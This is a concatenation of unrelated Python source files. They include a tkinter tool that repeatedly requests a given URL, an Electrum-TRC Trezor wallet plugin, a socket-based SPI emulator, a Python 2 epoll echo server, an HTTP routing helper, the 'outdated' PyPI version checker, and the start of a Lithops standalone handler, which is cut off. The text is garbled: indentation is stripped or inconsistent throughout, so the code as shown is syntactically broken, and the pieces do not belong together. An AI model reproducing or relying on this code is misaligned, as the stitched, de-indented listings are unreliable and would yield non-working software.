Frame.__init__(self, master)
self.pack()
self.fm_top = Frame(self)
# label_url
        self.label_url = Label(self.fm_top, text="URL:", padx=5)
self.label_url.pack(side=LEFT)
# input_url
self.input_url = Entry(self.fm_top)
self.input_url.pack(side=LEFT, expand=True, fill=X, padx=5, pady=5)
self.fm_top.pack(fill=X, pady=5)
self.fm_center = Frame(self)
# label_count
        self.label_count = Label(self.fm_center, text="Count:", padx=5)
self.label_count.pack(side=LEFT)
# input_count
self.input_count = Entry(self.fm_center, width=5)
self.input_count.insert(0, "100")
self.input_count.pack(side=LEFT, expand=True, fill=X, padx=5, pady=5)
# label_sleep
        self.label_sleep = Label(self.fm_center, text="Interval:", padx=5)
self.label_sleep.pack(side=LEFT)
# input_sleep
self.input_sleep = Entry(self.fm_center, width=5)
self.input_sleep.insert(0, "0")
self.input_sleep.pack(side=LEFT, expand=True, fill=X, padx=5, pady=5)
# btn_action
        self.btn_action = Button(self.fm_center, text='Start', command=self.action)
self.btn_action.pack(side=RIGHT, padx=10)
self.fm_center.pack(fill=X)
self.label_text_var = StringVar()
self.fm_bottom = Frame(self)
self.label = Label(self.fm_bottom, textvariable=self.label_text_var, width=50, height=15)
self.label.pack()
self.fm_bottom.pack(fill=X)
def action(self):
url = self.input_url.get()
count = self.input_count.get()
sleep = self.input_sleep.get()
if re.match(r"^\+?[1-9][0-9]*$", count):
count = int(count)
else:
            messagebox.showinfo("Notice", "Count must be a positive integer")
return
if not re.match(r"^\+?[0-9]*$", sleep):
            messagebox.showinfo("Notice", "Interval must be a number")
return
if not url:
            messagebox.showinfo("Notice", "Please enter a URL")
else:
options = Options()
options.url = url
options.count = count
options.sleep = int(sleep)
t = threading.Thread(target=main, args=(options, self.label_text_var))
t.setDaemon(True)
t.start()
def main(options, label_text=None):
i = 0
if options.count:
count = options.count
else:
count = 100
while i < count:
status = refresh(options)
i += 1
        text = "Visited %s time(s) - status:%s" % (i, status)
if not label_text:
print(text)
else:
label_text.set(text)
    text_end = "Finished, %s visit(s) in total" % count
if not label_text:
print(text_end)
else:
label_text.set(text_end)
def center(win):
"""
centers a tkinter window
:param win: the root or Toplevel window to center
"""
win.update_idletasks()
width = win.winfo_width()
fm_width = win.winfo_rootx() - win.winfo_x()
win_width = width + 2 * fm_width
height = win.winfo_height()
title_bar_height = win.winfo_rooty() - win.winfo_y()
win_height = height + title_bar_height + fm_width
x = win.winfo_screenwidth() // 2 - win_width // 2
y = win.winfo_screenheight() // 2 - win_height // 2
win.geometry('{}x{}+{}+{}'.format(width, height, x, y))
win.deiconify()
if __name__ == "__main__":
try:
if len(sys.argv[1:]) == 0:
root = Tk()
root.title("duang")
Application(root)
center(root)
root.mainloop()
else:
main(parse_options(sys.argv[1:]))
except Exception as e:
logging.error(e.args)
sys.exit(1)
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum_trc.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_trc.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_trc.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum_trc import constants
from electrum_trc.i18n import _
from electrum_trc.plugin import Device
from electrum_trc.transaction import deserialize, Transaction
from electrum_trc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_trc.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum_trc.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', )
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Terracoin Testnet" if constants.net.TESTNET else "Terracoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
spidev.py
|
import os
import socket
_SPI_CPHA = 0x01
_SPI_CPOL = 0x02
# _SPI_MODE_0 = 0
# _SPI_MODE_1 = SPI_CPHA
# _SPI_MODE_2 = SPI_CPOL
# _SPI_MODE_3 = SPI_CPOL | SPI_CPHA
# _SPI_MODES = [_SPI_MODE_0, _SPI_MODE_1, _SPI_MODE_2, _SPI_MODE_3]
_SPI_CS_HIGH = 0x04
_SPI_LSB_FIRST = 0x08
_SPI_3WIRE = 0x10
_SPI_LOOP = 0x20
_SPI_NO_CS = 0x40
_SPI_READY = 0x80
class SpiDev:
_socket = None
_bits_per_word = 0
# cshigh = False
# loop = None
# lsbfirst = False
_max_speed_hz = 0
_mode = 0
# threewire = False
def __init__(self):
port = 8789
ip = os.environ["RASPBERRY_IP"]
if "RASPBERRY_PORT" in os.environ:
port = int(os.environ["RASPBERRY_PORT"])
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.connect((ip, port))
def __del__(self):
if self._socket is not None:
try:
self._socket.close()
except Exception as e:
pass
def open(self, bus, device):
b = bytearray()
b.append(ord("o"))
b.append(bus)
b.append(device)
self._socket.send(b)
def xfer(self, data, speed_hz=0, delay_usec=0, bits_per_word=8):
b = bytearray()
b.append(ord("x"))
b.append(len(data) & 255)
b.append(len(data) >> 8 & 255)
for d in data:
b.append(d)
self._socket.send(b)
rec = self._socket.recv(len(data))
resp = []
for bb in rec:
resp.append(bb)
return resp
def xfer2(self, data, speed_hz=0, delay_usec=0, bits_per_word=8):
pass
def close(self):
        self._mode = 0
        self._bits_per_word = 0
        self._max_speed_hz = 0
b = bytearray()
b.append(ord("c"))
self._socket.send(b)
def readbytes(self, n):
pass
def writebytes(self, data):
pass
@property
def cshigh(self):
return self._mode & _SPI_CS_HIGH != 0
@cshigh.setter
def cshigh(self, cshigh):
if cshigh:
self._mode = self._mode | _SPI_CS_HIGH
else:
self._mode = self._mode & ~_SPI_CS_HIGH
@property
def lsbfirst(self):
return self._mode & _SPI_LSB_FIRST != 0
    @lsbfirst.setter
def lsbfirst(self, lsbfirst):
if lsbfirst:
self._mode = self._mode | _SPI_LSB_FIRST
else:
self._mode = self._mode & ~_SPI_LSB_FIRST
@property
def threewire(self):
return self._mode & _SPI_3WIRE != 0
@threewire.setter
def threewire(self, threewire):
if threewire:
self._mode = self._mode | _SPI_3WIRE
else:
self._mode = self._mode & ~_SPI_3WIRE
@property
def loop(self):
        return self._mode & _SPI_LOOP != 0
@loop.setter
def loop(self, loop):
if loop:
self._mode = self._mode | _SPI_LOOP
else:
self._mode = self._mode & ~_SPI_LOOP
@property
def bits_per_word(self):
return self._bits_per_word
@bits_per_word.setter
def bits_per_word(self, bits_per_word):
if bits_per_word < 8 or bits_per_word > 16:
raise ValueError("invalid bits_per_word (8 to 16)")
self._bits_per_word = bits_per_word
@property
def max_speed_hz(self):
        return self._max_speed_hz
    @max_speed_hz.setter
    def max_speed_hz(self, max_speed_hz):
        self._max_speed_hz = max_speed_hz
@property
def mode(self):
return self._mode & (_SPI_CPHA | _SPI_CPOL)
@mode.setter
    def mode(self, mode):
self._mode = (self._mode & ~(_SPI_CPHA | _SPI_CPOL)) | mode
if __name__ == "__main__":
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 8789))
s.listen(1)
def startListen():
import threading
def session(con):
while True:
# print("Waiting to command")
cmd = ord(con.recv(1))
if cmd == ord("c"):
print("Close")
elif cmd == ord("o"):
bus = ord(con.recv(1))
device = ord(con.recv(1))
print("Opening " + str(bus) + "." + str(device))
elif cmd == ord("x"):
l = ord(con.recv(1))
h = ord(con.recv(1))
                    size = l + (h << 8)  # low byte plus shifted high byte ('+' binds tighter than '<<')
print("Receiving " + str(size) +" bytes")
data = con.recv(size)
print("Received " + str(data))
con.send(data)
else:
print("Unknown command " + str(cmd))
def listen():
while True:
con, addr = s.accept()
t = threading.Thread(target=session, args=[con])
t.daemon = True
t.start()
thread = threading.Thread(target=listen)
thread.daemon = True
thread.start()
try:
startListen()
os.environ["RASPBERRY_IP"] = "127.0.0.1"
spi = SpiDev()
print("opening spi")
spi.open(1, 2)
print("sending data")
spi.xfer(b"Hello")
print("closing")
spi.close()
finally:
s.close()
s.detach()
|
message_server.py
|
import socket
import select
import threading
import time
import message
class MessageServer(object):
def __init__(self, host, port, timeout=1):
self.host = host
self.port = port
self.timeout = timeout
self.epoll = select.epoll()
self.fd_to_socket = {}
self.client_buffer = {}
self.mssocket = self.init_server()
def init_server(self):
mssocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mssocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
address = (self.host, self.port)
mssocket.bind(address)
mssocket.listen(100)
self.epoll.register(mssocket.fileno(), select.EPOLLIN)
self.fd_to_socket[mssocket.fileno()] = mssocket
return mssocket
def close_server(self):
self.mssocket.close()
print "Server closed!"
def server_cron(self):
print "Run server cron"
def process(self, fd, type, data):
#print "Process message here"
# for test
if type == message.message_echo_type:
self.add_reply(fd, type, data)
else:
print "error message type", type
def close_client(self, fd):
self.epoll.unregister(fd)
        sock = self.fd_to_socket[fd]  # local name avoids shadowing the socket module
        sock.close()
del self.fd_to_socket[fd]
del self.client_buffer[fd]
def add_reply(self, fd, type, data):
print "reply:", fd, type, data
if data is None or len(data) == 0:
return
write_buffer = self.client_buffer[fd][1]
message.extend_message(write_buffer, type, data)
self.epoll.modify(fd, select.EPOLLOUT)
def run(self):
epoll_wait_time = self.timeout
last_server_cron_run = time.time()
print "Start to wait epoll event"
while True:
events = self.epoll.poll(epoll_wait_time)
# Run server cron
server_cron_check = time.time()
            # the elapsed time can occasionally come out negative (e.g. clock adjustments),
            # so clamp it at 0
server_cron_gap_time = max(server_cron_check - last_server_cron_run, 0)
if server_cron_gap_time > epoll_wait_time:
self.server_cron()
epoll_wait_time = self.timeout
last_server_cron_run = time.time()
else:
epoll_wait_time -= server_cron_gap_time
for fd, event in events:
                sock = self.fd_to_socket[fd]  # avoid shadowing the socket module (socket.error is used below)
                if sock == self.mssocket:
if not event & select.EPOLLIN:
print "Server error!"
exit(-1)
# new connection
connect_socket, address = self.mssocket.accept()
connect_socket.setblocking(False)
self.epoll.register(connect_socket.fileno(),
select.EPOLLIN)
self.fd_to_socket[connect_socket.fileno()] = connect_socket
                    # index 0 is the read buffer, index 1 the write buffer
self.client_buffer[connect_socket.fileno()] = [ [], []]
elif event & select.EPOLLHUP:
print "Client close!"
self.close_client(fd)
elif event & select.EPOLLIN:
try:
                        data = sock.recv(1024)
except socket.error as e:
print e
continue
if not data:
print "Client close!"
self.close_client(fd)
else:
read_buffer = self.client_buffer[fd][0]
read_buffer.extend(data)
while True:
status, m, read_buffer = message.remove_message(read_buffer)
self.client_buffer[fd][0] = read_buffer
if status == message.parse_ok:
type, data = m
# process
self.process(fd, type, data)
elif status == message.buffer_not_enough:
break
else:
print "Parse message error, close Client"
self.close_client(fd)
break
elif event & select.EPOLLOUT:
write_buffer = ''.join(self.client_buffer[fd][1])
                    nwrite = sock.send(write_buffer)
self.client_buffer[fd][1] = list(write_buffer[nwrite:])
if len(self.client_buffer[fd][1]) == 0:
self.epoll.modify(fd, select.EPOLLIN)
self.close_server()
lock = threading.Lock()
def run_test_client():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 12346))
for i in range(8):
id = threading.currentThread().ident
data = "this id no is " + str(id) + " %d send time!" % i
buf = message.extend_message([], message.message_echo_type, data)
#print "send_totlan", len(buf)
s.sendall(''.join(buf))
read_buffer = []
target_read_size = len(buf)
total_read_size = 0
while total_read_size < target_read_size:
chunk = s.recv(min(target_read_size - total_read_size,
1024))
if len(chunk) == 0:
                raise RuntimeError("connection broken")
read_buffer.extend(chunk)
total_read_size += len(chunk)
status, m, read_buffer = message.remove_message(read_buffer)
lock.acquire()
print "receive reply", status, m
lock.release()
if __name__ == '__main__':
server = MessageServer("127.0.0.1", 12346)
for i in range(100):
t = threading.Thread(target=run_test_client)
t.start()
server.run()
|
httpd.py
|
from .server import EasyServer
from .datastruct import *
import threading
__server = None
def start_serve(port: int = 8090, address: str = "0.0.0.0", blocking=True):
global __server
if __server is None:
try:
__server = EasyServer(port, address)
if not blocking:
thread = threading.Thread(target=__server.serve_forever)
thread.start()
return thread
else:
__server.serve_forever()
except Exception as e:
print(str(e))
def requestMapping(path, methods=[m for m in Method]):
def converter(listener):
EasyServer.addRequestListener(path, methods, listener)
return listener
return converter
def get(path):
return requestMapping(path, [Method.GET])
def post(path):
return requestMapping(path, [Method.POST])
|
__init__.py
|
import json
from datetime import datetime
from threading import Thread
from outdated import utils
from outdated.mywarnings import *
from outdated.utils import warn_with_ignore
__version__ = '0.2.0'
def check_outdated(package, version):
"""
Given the name of a package on PyPI and a version (both strings), checks
if the given version is the latest version of the package available.
Returns a 2-tuple (is_outdated, latest_version) where
is_outdated is a boolean which is True if the given version is earlier
than the latest version, which is the string latest_version.
Attempts to cache on disk the HTTP call it makes for 24 hours. If this
somehow fails the exception is converted to a warning (OutdatedCacheFailedWarning)
and the function continues normally.
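    For example (illustrative values)::
        is_outdated, latest = check_outdated('requests', '2.0.0')
        if is_outdated:
            print('A newer version is available:', latest)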
"""
from pkg_resources import parse_version
parsed_version = parse_version(version)
latest = None
with utils.cache_file(package, 'r') as f:
content = f.read()
if content: # in case cache_file fails and so f is a dummy file
latest, cache_dt = json.loads(content)
if not utils.cache_is_valid(cache_dt):
latest = None
def get_latest():
url = 'https://pypi.python.org/pypi/%s/json' % package
response = utils.get_url(url)
return json.loads(response)['info']['version']
if latest is None:
latest = get_latest()
parsed_latest = parse_version(latest)
if parsed_version > parsed_latest:
# Probably a stale cached value
latest = get_latest()
parsed_latest = parse_version(latest)
if parsed_version > parsed_latest:
raise ValueError('Version %s is greater than the latest version on PyPI: %s' %
(version, latest))
is_latest = parsed_version == parsed_latest
assert is_latest or parsed_version < parsed_latest
with utils.cache_file(package, 'w') as f:
data = [latest, utils.format_date(datetime.now())]
json.dump(data, f)
return not is_latest, latest
def warn_if_outdated(package,
version,
raise_exceptions=False,
background=True,
):
"""
Higher level convenience function using check_outdated.
The package and version arguments are the same.
If the package is outdated, a warning (OutdatedPackageWarning) will
be emitted.
Any exception in check_outdated will be converted to a warning (OutdatedCheckFailedWarning)
    unless raise_exceptions is True.
If background is True (the default), the check will run in
a background thread so this function will return immediately.
    In this case if an exception is raised and raise_exceptions is True
the traceback will be printed to stderr but the program will not be
interrupted.
This function doesn't return anything.
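    For example (illustrative; see also the call at the bottom of this module)::
        warn_if_outdated('my-package', '1.0.0')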
"""
def check():
# noinspection PyUnusedLocal
is_outdated = False
with utils.exception_to_warning('check for latest version of package',
OutdatedCheckFailedWarning,
always_raise=raise_exceptions):
is_outdated, latest = check_outdated(package, version)
if is_outdated:
warn_with_ignore(
'The package %s is out of date. Your version is %s, the latest is %s.'
% (package, version, latest),
OutdatedPackageWarning,
)
if background:
thread = Thread(target=check)
thread.start()
else:
check()
warn_if_outdated('outdated', __version__)
|
standalone.py
|
#
# Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shlex
import json
import time
import select
import logging
import importlib
import requests
from threading import Thread
from lithops.utils import is_lithops_worker, create_handler_zip
from lithops.constants import LOGS_DIR, REMOTE_INSTALL_DIR, FN_LOG_FILE
from lithops.storage.utils import create_job_key
logger = logging.getLogger(__name__)
FH_ZIP_LOCATION = os.path.join(os.getcwd(), 'lithops_standalone.zip')
PROXY_SERVICE_NAME = 'lithopsproxy.service'
PROXY_SERVICE_PORT = 8080
PROXY_SERVICE_FILE = """
[Unit]
Description=Lithops Proxy
After=network.target
[Service]
ExecStart=/usr/bin/python3 {}/proxy.py
Restart=always
[Install]
WantedBy=multi-user.target
""".format(REMOTE_INSTALL_DIR)
class StandaloneHandler:
"""
A StandaloneHandler object is used by invokers and other components to access
    the underlying standalone backend without exposing the implementation details.
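    Illustrative configuration sketch (the keys mirror the values read in __init__ below;
    the backend name and its nested options are assumptions)::
        standalone_config = {
            'backend': 'some_backend',      # hypothetical backend module name
            'runtime': 'python3',
            'start_timeout': 300,
            'some_backend': {'...': '...'}  # backend-specific options
        }
        handler = StandaloneHandler(standalone_config)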
"""
def __init__(self, standalone_config):
self.log_active = logger.getEffectiveLevel() != logging.WARNING
self.config = standalone_config
self.backend_name = self.config['backend']
self.runtime = self.config['runtime']
self.is_lithops_worker = is_lithops_worker()
self.start_timeout = self.config.get('start_timeout', 300)
self.auto_dismantle = self.config.get('auto_dismantle')
self.hard_dismantle_timeout = self.config.get('hard_dismantle_timeout')
self.soft_dismantle_timeout = self.config.get('soft_dismantle_timeout')
try:
module_location = 'lithops.standalone.backends.{}'.format(self.backend_name)
sb_module = importlib.import_module(module_location)
StandaloneBackend = getattr(sb_module, 'StandaloneBackend')
